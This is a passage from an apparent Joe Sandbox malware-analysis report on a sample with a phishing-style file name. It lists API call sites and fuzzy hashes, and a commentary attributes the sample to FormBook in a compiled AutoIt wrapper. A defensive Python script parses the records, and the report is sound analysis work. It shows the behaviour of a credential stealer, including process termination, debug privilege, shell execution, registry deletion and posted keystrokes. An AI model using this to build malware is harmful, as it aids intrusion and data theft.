• Opcode Fuzzy Hash: b23154f31aa061fd643e0a8cd0dafa7ebbd42dfddff87cde6327c2941c93b6ee
• Instruction Fuzzy Hash: 4441AF70A40308ABDB219FA4DC85FEA77FEEB08350F10052AF945A7292D6719D85CB64
APIs
  • Part of subcall function 00646532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00646554
  • Part of subcall function 00646532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00646564
  • Part of subcall function 00646532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 006465F9
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0066179A
• GetLastError.KERNEL32 ref: 006617AD
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 006617D9
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00661855
• GetLastError.KERNEL32(00000000), ref: 00661860
• CloseHandle.KERNEL32(00000000), ref: 00661895
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: 3e942ae266f6732f5d8952b450762cbfc43caeddc881aac5031a60f4be1a90ec
• Instruction ID: cd112c8947824dc659ab321a39c1c03d32150f43700ac0782e5a9178eb336f9a
• Opcode Fuzzy Hash: 3e942ae266f6732f5d8952b450762cbfc43caeddc881aac5031a60f4be1a90ec
• Instruction Fuzzy Hash: 6541BE71600201AFDB45EF64C9A5FAEB7A7AF55310F08805CFA069F3C2DB78A944CB95
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 006458B8
Strings
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID: 05f804dac12776512df10039937433790475b44c25f6c903ca8c5909c887e34e
• Instruction ID: 475f6bcbecd95f5456f8cf089da577af228441775281ff3ea91465dc224f6b77
• Opcode Fuzzy Hash: 05f804dac12776512df10039937433790475b44c25f6c903ca8c5909c887e34e
• Instruction Fuzzy Hash: D411EB71749B76BFE7115A54AC92DEA339F9F15310B30003AF902A53C3FB70AA404769
APIs
• SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0064A806
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
• Opcode ID: 7d4965822e5115571f846c7fc40e8405b558c6d4edb7b9c1367cd17a6e673c4e
• Instruction ID: 31c24254f669c70339be98857ac75e6c482f0f8d1e1090c8a73981fee331af1a
• Opcode Fuzzy Hash: 7d4965822e5115571f846c7fc40e8405b558c6d4edb7b9c1367cd17a6e673c4e
• Instruction Fuzzy Hash: C6C17C75A4421AEFDB00DF98C481BEEB7F6EF08315F244069E605E7381D734A982CB95
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00646B63
• LoadStringW.USER32(00000000), ref: 00646B6A
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00646B80
• LoadStringW.USER32(00000000), ref: 00646B87
• _wprintf.LIBCMT ref: 00646BAD
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00646BCB
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00646BA8
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
• Opcode ID: 5e59ba1e69d87ebbd247c1928a6fa70b8bc4428ac73911cc4795e1ffdb9f5294
• Instruction ID: 80d818db8631cddb6c18641cd46a5d94ad73a473030102a3a7c94c99a1e01a53
• Opcode Fuzzy Hash: 5e59ba1e69d87ebbd247c1928a6fa70b8bc4428ac73911cc4795e1ffdb9f5294
• Instruction Fuzzy Hash: 1C0181F2900218BFEB11ABA0DD89EF7376DDB08304F0045A2B746E2181EA749E848F71
APIs
  • Part of subcall function 00663C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00662BB5,?,?), ref: 00663C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00662BF6
                                                              Similarity
                                                              • API ID: BuffCharConnectRegistryUpper
                                                              • String ID:
                                                              • API String ID: 2595220575-0
                                                              • Opcode ID: f873f1eef36e8aa4079c846124a0c991df04771248ce1b7d7c4e60df81d189ef
                                                              • Instruction ID: ab4db44287283d26156df0de5657887bf3785512267d85824ce05d14a69e019e
                                                              • Opcode Fuzzy Hash: f873f1eef36e8aa4079c846124a0c991df04771248ce1b7d7c4e60df81d189ef
                                                              • Instruction Fuzzy Hash: C1918C71204202AFCB45EF54C8A1B6EB7E6FF88314F04891DF996973A1DB34E945CB46
                                                              APIs
                                                              • select.WSOCK32 ref: 00659691
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0065969E
                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 006596C8
                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006596E9
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006596F8
                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 006597AA
                                                              • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0069DC00), ref: 00659765
                                                                • Part of subcall function 0063D2FF: _strlen.LIBCMT ref: 0063D309
                                                              • _strlen.LIBCMT ref: 00659800
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                              • String ID:
                                                              • API String ID: 3480843537-0
                                                              • Opcode ID: 3c56dbce9af76a2ceaad8aed62e2f16f93693e20fb48c4ba558198fa34a73a96
                                                              • Instruction ID: 7c641b4d78ddc0244427f1c68477d012b300677b112bcc505d48bf0326d20df7
                                                              • Opcode Fuzzy Hash: 3c56dbce9af76a2ceaad8aed62e2f16f93693e20fb48c4ba558198fa34a73a96
                                                              • Instruction Fuzzy Hash: E981FD71504200AFC754EF64CC85EABB7EAEF89710F144A1DF9559B2D2EB30D908CBA6
                                                              APIs
                                                              • __mtinitlocknum.LIBCMT ref: 0062A991
                                                                • Part of subcall function 00627D7C: __FF_MSGBANNER.LIBCMT ref: 00627D91
                                                                • Part of subcall function 00627D7C: __NMSG_WRITE.LIBCMT ref: 00627D98
                                                                • Part of subcall function 00627D7C: __malloc_crt.LIBCMT ref: 00627DB8
                                                              • __lock.LIBCMT ref: 0062A9A4
                                                              • __lock.LIBCMT ref: 0062A9F0
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,006B6DE0,00000018,00635E7B,?,00000000,00000109), ref: 0062AA0C
                                                              • EnterCriticalSection.KERNEL32(8000000C,006B6DE0,00000018,00635E7B,?,00000000,00000109), ref: 0062AA29
                                                              • LeaveCriticalSection.KERNEL32(8000000C), ref: 0062AA39
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                              • String ID:
                                                              • API String ID: 1422805418-0
                                                              • Opcode ID: b1aec62b3995814f9f84e149db1475b33d5664517167bdf50259a8e01e8157a5
                                                              • Instruction ID: 9934dde70f96abcb996c9064f85862585d4bdf30b0d9f5dd1e56f98d854b7e8b
                                                              • Opcode Fuzzy Hash: b1aec62b3995814f9f84e149db1475b33d5664517167bdf50259a8e01e8157a5
                                                              • Instruction Fuzzy Hash: 6C412971900A219BEB109FE8EA44BACB7B3AF01325F10431DE425AB2D1D7F49941CF96
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 00668EE4
                                                              • GetDC.USER32(00000000), ref: 00668EEC
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00668EF7
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00668F03
                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00668F3F
                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00668F50
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0066BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00668F8A
                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00668FAA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                              • String ID:
                                                              • API String ID: 3864802216-0
                                                              • Opcode ID: 45079f790ca6daa3e383708e5f26303d3b019b99151a75da9c4fcba88fba27e5
                                                              • Instruction ID: 391b6069b1d22f6054a3671a63338d3b6676b741fcaac5cc4777c0b83444aeed
                                                              • Opcode Fuzzy Hash: 45079f790ca6daa3e383708e5f26303d3b019b99151a75da9c4fcba88fba27e5
                                                              • Instruction Fuzzy Hash: A3314F72200214BFEF118F60CC49FEA3BAEEF49755F044265FE09DA291D6B59841CB74
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • GetSystemMetrics.USER32(0000000F), ref: 0067016D
                                                              • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0067038D
                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006703AB
                                                              • InvalidateRect.USER32(?,00000000,00000001,?), ref: 006703D6
                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006703FF
                                                              • ShowWindow.USER32(00000003,00000000), ref: 00670421
                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00670440
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                              • String ID:
                                                              • API String ID: 3356174886-0
                                                              • Opcode ID: 9a75312fa14054fad2b8643b931da56bf15419bf779e98dce371c83898e8eaa7
                                                              • Instruction ID: da97b4c9aaa6b66c88065264ff67491c7f45dd4e9695d639e6d7fa4abee50d12
                                                              • Opcode Fuzzy Hash: 9a75312fa14054fad2b8643b931da56bf15419bf779e98dce371c83898e8eaa7
                                                              • Instruction Fuzzy Hash: CEA19F35600616EBEB18CF68C9857FDBBB2BF04710F14C215EC58AB295D774AD51CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e25e048d9b29ebadcc12516eee9791f3223392297464fb2f95aada4cb631dd9d
                                                              • Instruction ID: 428c94d5dde4d506f2e3a168f63adcbe653d79bd03055d9b769c44ef349c3db6
                                                              • Opcode Fuzzy Hash: e25e048d9b29ebadcc12516eee9791f3223392297464fb2f95aada4cb631dd9d
                                                              • Instruction Fuzzy Hash: DC715E71901109EFCB14CF98CC49AEEBB76FF89314F188149F915AA251C7349A42CF65
                                                              APIs
                                                              • _memset.LIBCMT ref: 0066225A
                                                              • _memset.LIBCMT ref: 00662323
                                                              • ShellExecuteExW.SHELL32(?), ref: 00662368
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                                • Part of subcall function 0061C6F4: _wcscpy.LIBCMT ref: 0061C717
                                                              • CloseHandle.KERNEL32(00000000), ref: 0066242F
                                                              • FreeLibrary.KERNEL32(00000000), ref: 0066243E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                              • String ID: @
                                                              • API String ID: 4082843840-2766056989
                                                              • Opcode ID: 179b06ee44497f03ab5bab65805c48476bc4d2df7e991426000194526313b1b0
                                                              • Instruction ID: d287956bcc3338c40f1766e3a6fd853017e996937bcb9ea4aaa380274a7b8018
                                                              • Opcode Fuzzy Hash: 179b06ee44497f03ab5bab65805c48476bc4d2df7e991426000194526313b1b0
                                                              • Instruction Fuzzy Hash: 24715D74A0061A9FCF48EFA4C89199EBBF6FF48310F108559E855AB391DB34AD40CB94
                                                              APIs
                                                              • GetParent.USER32(00000000), ref: 00643C02
                                                              • GetKeyboardState.USER32(?), ref: 00643C17
                                                              • SetKeyboardState.USER32(?), ref: 00643C78
                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00643CA4
                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00643CC1
                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00643D05
                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00643D26
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: 1c646a4f68769035f42faf3c5fafa4e720d49eb7efb7d29f746c86cf856c9fba
                                                              • Instruction ID: 84dad5c0c49f1c3905d7680ef933f3e0923d6535a9b95df76ea1e281319e38d9
                                                              • Opcode Fuzzy Hash: 1c646a4f68769035f42faf3c5fafa4e720d49eb7efb7d29f746c86cf856c9fba
                                                              • Instruction Fuzzy Hash: 2D51E6A09047E53DFB3687248C56BFABFAB9F06304F088589E0D556BC2D694EE84D760
                                                              APIs
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00663DA1
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00663DCB
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00663E80
                                                                • Part of subcall function 00663D72: RegCloseKey.ADVAPI32(?), ref: 00663DE8
                                                                • Part of subcall function 00663D72: FreeLibrary.KERNEL32(?), ref: 00663E3A
                                                                • Part of subcall function 00663D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00663E5D
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00663E25
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                              • String ID:
                                                              • API String ID: 395352322-0
                                                              • Opcode ID: 77dc5d916bfac6baa7eb8ec4a51cbf941e68590254c843af2687410aeeefbb25
                                                              • Instruction ID: 8d052e331b6237154680abc3a1fbd7fededea37ca86fe9ff1c1d721081f39f56
                                                              • Opcode Fuzzy Hash: 77dc5d916bfac6baa7eb8ec4a51cbf941e68590254c843af2687410aeeefbb25
                                                              • Instruction Fuzzy Hash: CF310BB1911119BFDB159F90DC89EFFB7BEEF08300F10016AE512A2291D671AF499BB0
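The records on this page are the Joe Sandbox IDA plugin's per-function export: an "APIs" list of call sites with their addresses, then the dump source and the similarity hashes. Because the sample is flagged above as a likely compiled AutoIt script, these API lists most plausibly describe the AutoIt runtime that any compiled script carries, not the FormBook payload, so the fuzzy hashes should not be treated as sample-specific indicators. The following Python script is an added example, not part of the Joe Sandbox report or its tooling: it parses the export format seen here into structured call records so the call sequences can be queried, for instance listing the virtual-key codes that the function at 00643C02 posts as WM_KEYDOWN (0x10, 0x11, 0x12 and 0x5B are VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN). The sample text is a constructed excerpt of three records copied from this page; the record-boundary and line formats it assumes are only those visible above, and the "Part of subcall function" handling is the author's reading of that prefix.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed excerpt: three records copied from the report above, trimmed to the
# lines this parser reads (dump-source and hash lines are ignored anyway).
SAMPLE = """\
APIs
• GetParent.USER32(00000000), ref: 00643C02
• GetKeyboardState.USER32(?), ref: 00643C17
• SetKeyboardState.USER32(?), ref: 00643C78
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00643CA4
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00643CC1
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00643D05
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00643D26
• API ID: MessagePost$KeyboardState$Parent
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00663DA1
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00663DCB
• FreeLibrary.KERNEL32(00000000), ref: 00663E80
  • Part of subcall function 00663D72: RegCloseKey.ADVAPI32(?), ref: 00663DE8
  • Part of subcall function 00663D72: FreeLibrary.KERNEL32(?), ref: 00663E3A
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00663E25
• API ID: EnumFreeLibrary$CloseDeleteOpen
APIs
• select.WSOCK32 ref: 00659691
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006596E9
"""

# One call-site line. "?" is an argument the plugin could not resolve; the
# "Part of subcall function X:" prefix marks a call made inside callee X
# (assumed reading of the prefix). Imports by ordinal appear as "#<n>".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[#\w@]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class Call:
    api: str
    module: str
    args: tuple                       # int per constant argument, None per "?"
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # callee address for "Part of subcall" lines

@dataclass
class FunctionRecord:
    calls: List[Call] = field(default_factory=list)
    api_id: str = ""                  # Joe's API-name signature for the function

def parse_args(text: Optional[str]) -> tuple:
    if not text or not text.strip():
        return ()
    return tuple(None if t.strip() == "?" else int(t, 16) for t in text.split(","))

def parse_records(text: str) -> List[FunctionRecord]:
    """Split the export at each 'APIs' header and collect that function's calls."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            cur = FunctionRecord()
            records.append(cur)
        elif cur is None:
            continue
        elif (m := CALL_RE.match(line)):
            cur.calls.append(Call(m["api"], m["mod"].upper(), parse_args(m["args"]),
                                  int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None))
        elif stripped.startswith("• API ID:"):
            cur.api_id = stripped.split(":", 1)[1].strip()
    return records

def call_sequence(rec: FunctionRecord, include_subcalls: bool = False) -> List[Call]:
    """Calls in address order. Subcall lines carry the callee's own call sites,
    so they would interleave with the function's calls; skip them by default."""
    return sorted((c for c in rec.calls if include_subcalls or c.subcall_of is None),
                  key=lambda c: c.ref)

def find_calls(records: List[FunctionRecord], api: str, pattern: tuple = ()) -> List[Call]:
    """Calls to `api` whose leading arguments match `pattern` (None = wildcard)."""
    return [c for rec in records for c in rec.calls
            if c.api == api and len(pattern) <= len(c.args)
            and all(p is None or p == a for p, a in zip(pattern, c.args))]

WM_KEYDOWN = 0x100

def keydown_vks(records: List[FunctionRecord]) -> List[int]:
    """Virtual-key codes posted as WM_KEYDOWN (wParam of PostMessageW)."""
    return [c.args[2] for c in find_calls(records, "PostMessageW", (None, WM_KEYDOWN))]

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        print(rec.api_id or "-", "->",
              [f"{c.module}!{c.api}@{c.ref:08X}" for c in call_sequence(rec)])
    print("WM_KEYDOWN virtual keys:", [hex(v) for v in keydown_vks(recs)])
```

Run against a full report export, `find_calls` is the useful pivot: the same pattern argument that pulls the WM_KEYDOWN posts here can select, say, every `ShellExecuteExW` or `RegDeleteKeyW` call site, and `call_sequence` gives the address-ordered API sequence per function, which is a better basis for comparing two compiled-AutoIt samples than the whole-function fuzzy hashes.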
                                                              APIs
                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00668FE7
                                                              • GetWindowLongW.USER32(00BAFED0,000000F0), ref: 0066901A
                                                              • GetWindowLongW.USER32(00BAFED0,000000F0), ref: 0066904F
                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00669081
                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006690AB
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 006690BC
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006690D6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$MessageSend
                                                              • String ID:
                                                              • API String ID: 2178440468-0
                                                              • Opcode ID: 3ef0dc2770bbd607a2d2813afa289f78a01ed31e796e873fbaa0762a9a90d10d
                                                              • Instruction ID: ac10405084fcecb3453daedab83e67708a667d7a493285516e080fe48569914c
                                                              • Opcode Fuzzy Hash: 3ef0dc2770bbd607a2d2813afa289f78a01ed31e796e873fbaa0762a9a90d10d
                                                              • Instruction Fuzzy Hash: 65312434600215EFDB208F59DC84FA437ABFB4A718F141269F9198F2B2CB71A880DB61
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006408F2
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00640918
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0064091B
                                                              • SysAllocString.OLEAUT32(?), ref: 00640939
                                                              • SysFreeString.OLEAUT32(?), ref: 00640942
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00640967
                                                              • SysAllocString.OLEAUT32(?), ref: 00640975
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                               • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: 2326dcf70c5240f27dd8ddd54453c32a3f9d6f1f3167c198514a4d1a278dd8a4
                                                              • Instruction ID: 909b3f9f82f63b1f254e23ee1f250676a8a1b4def4549ab8dffefea88253ec0b
                                                              • Opcode Fuzzy Hash: 2326dcf70c5240f27dd8ddd54453c32a3f9d6f1f3167c198514a4d1a278dd8a4
